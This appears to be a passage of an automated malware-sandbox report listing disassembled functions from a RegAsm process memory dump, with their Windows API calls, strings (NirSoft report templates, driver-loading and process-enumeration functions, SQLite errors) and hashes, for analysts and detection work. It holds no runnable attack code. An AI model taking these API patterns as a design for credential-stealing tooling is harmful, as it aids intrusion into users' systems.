                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf$wcscpy
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                          • API String ID: 1283228442-2366825230
                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 00413972
                                          • wcscpy.MSVCRT ref: 00413982
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          • wcscpy.MSVCRT ref: 004139D1
                                          • wcscat.MSVCRT ref: 004139DC
                                          • memset.MSVCRT ref: 004139B8
                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                          • memset.MSVCRT ref: 00413A00
                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                          • wcscat.MSVCRT ref: 00413A27
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                          • String ID: \systemroot
                                          • API String ID: 4173585201-1821301763
                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                          Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                          • API String ID: 4139908857-2887671607
                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                          Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                          • strchr.MSVCRT ref: 0040C140
                                          • strchr.MSVCRT ref: 0040C151
                                          • _strlwr.MSVCRT ref: 0040C15F
                                          • memset.MSVCRT ref: 0040C17A
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                          • String ID: 4$h
                                          • API String ID: 4019544885-1856150674
                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                          • String ID: 0$6
                                          • API String ID: 4066108131-3849865405
                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004082EF
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memset.MSVCRT ref: 00408362
                                          • memset.MSVCRT ref: 00408377
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 290601579-0
                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$wcslen
                                          • String ID:
                                          • API String ID: 3592753638-3916222277
                                          • Opcode ID: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                          • Opcode Fuzzy Hash: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040A47B
                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                          • wcslen.MSVCRT ref: 0040A4BA
                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • wcslen.MSVCRT ref: 0040A4E0
                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$_snwprintfmemset
                                          • String ID: %s (%s)$YV@
                                          • API String ID: 3979103747-598926743
                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                          • wcslen.MSVCRT ref: 0040A6B1
                                          • wcscpy.MSVCRT ref: 0040A6C1
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                          • wcscpy.MSVCRT ref: 0040A6DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2767993716-572158859
                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                          • unable to open database: %s, xrefs: 0042F84E
                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                          • out of memory, xrefs: 0042F865
                                          • database %s is already in use, xrefs: 0042F6C5
                                          • database is already attached, xrefs: 0042F721
                                          • too many attached databases - max %d, xrefs: 0042F64D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                          • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                          • GetLastError.KERNEL32 ref: 004178FB
                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastLockSleepUnlock
                                          • String ID:
                                          • API String ID: 3015003838-0
                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                          • wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                          • wcslen.MSVCRT ref: 0040D1D3
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                          • String ID: strings
                                          • API String ID: 3166385802-3030018805
                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040D8BD
                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                          • memset.MSVCRT ref: 0040D906
                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                          • String ID: sysdatetimepick32
                                          • API String ID: 1028950076-4169760276
                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                          Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$FreeLoadMessage
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 3897320386-317687271
                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                          Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 4271163124-70141382
                                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                          Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 4139908857-3953557276
                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                          • memset.MSVCRT ref: 0041BA3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: -journal$-wal
                                          • API String ID: 438689982-2894717839
                                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                          • GetTickCount.KERNEL32 ref: 0041887D
                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                          • String ID:
                                          • API String ID: 4218492932-0
                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                          • memset.MSVCRT ref: 00405ABB
                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                          • SetFocus.USER32(?), ref: 00405B76
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
